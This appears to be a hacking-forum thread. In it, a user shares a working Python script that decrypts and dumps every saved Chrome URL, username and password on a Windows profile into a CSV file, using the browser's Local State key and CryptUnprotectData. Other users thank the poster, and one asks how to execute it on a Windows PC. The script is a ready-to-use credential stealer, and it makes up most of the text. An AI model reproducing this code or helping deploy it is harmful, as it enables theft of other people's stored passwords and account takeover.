Posts: 123
Threads: 10
Joined: Jun 2023
 
(07-16-2023, 10:40 AM)Tugamer89 Wrote: (07-14-2023, 09:43 AM)bytemafia Wrote: (07-14-2023, 09:01 AM)Tugamer89 Wrote: I hate CryptUnprotectData
why?
'cause I got too many errors and I don't like debugging 

Posts: 132
Threads: 6
Joined: Jul 2023
  
cool code, thank you so much
Posts: 609
Threads: 31
Joined: Jun 2023
I remember finding something similar on github and quite perturbed that it was so easy to extract all the passwords and usernames.
Posts: 15
Threads: 1
Joined: Aug 2023
(07-13-2023, 03:05 PM)bytemafia Wrote: Just made a simple python script to extract all saved user credential from chrome
It will extract URLs, Usernames and Passwords then save it to a CSV file.
import os
import csv
import json
import shutil
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
USER_DATA_PATH, LOCAL_STATE_PATH = f"{os.environ['USERPROFILE']}\\AppData\\Local\\Google\\Chrome\\User Data", f"{os.environ['USERPROFILE']}\\AppData\\Local\\Google\\Chrome\\User Data\\Local State"
TEMP_DB = f"{os.environ['TEMP']}\\justforfun.db"
# Collecting secret key
def secretKey():
try:
with open(LOCAL_STATE_PATH, "r") as f:
local_state = f.read()
key_text = json.loads(local_state)["os_crypt"]["encrypted_key"]
key_buffer = base64.b64decode(key_text)[5:]
key = win32crypt.CryptUnprotectData(key_buffer)[1]
return key
except Exception as e:
print(e)
# Login to db where creds are stored
def login_db(db_path):
try:
shutil.copy(db_path, TEMP_DB) # Copy to temp dir, otherwise get permission error
sql_connection = sqlite3.connect(TEMP_DB)
return sql_connection
except Exception as e:
print(e)
# Decrypt the password
def password_decrypt(secret_key, ciphertext):
try:
iv = ciphertext[3:15]
password_hash = ciphertext[15:-16]
cipher = AES.new(secret_key, AES.MODE_GCM, iv)
password = cipher.decrypt(password_hash).decode()
return password
except Exception as e:
print(e)
def main():
print("Chrome Password Decryptor by bytemafia")
with open('passwords.csv', mode='w', newline='') as passfile: # Write file
writer = csv.writer(passfile, delimiter=',')
writer.writerow(["No <-> URL <-> Username <-> Password"])
secret_key = secretKey()
default_folders = ("Profile", "Default")
data_folders = [data_path for data_path in os.listdir(USER_DATA_PATH) if data_path.startswith(default_folders)]
for data_folder in data_folders:
db_path = f"{USER_DATA_PATH}\\{data_folder}\\Login Data" # Chrome db
con = login_db(db_path)
if secret_key and con:
cur = con.cursor()
cur.execute("select action_url, username_value, password_value from logins")
for index, data in enumerate(cur.fetchall()):
url = data[0]
username = data[1]
ciphertext = data[2]
if url != "" and username != "" and ciphertext != "": # To only collect valid entries
password = password_decrypt(secret_key, ciphertext)
writer.writerow([index, url, username, password])
print("Completed!")
con.close()
os.remove(TEMP_DB)
main()
Install additional modules:
pip install pycryptodomex
Supported OS: Windows 10, Windows 11
how do i apply this to a windows pc for execution?
|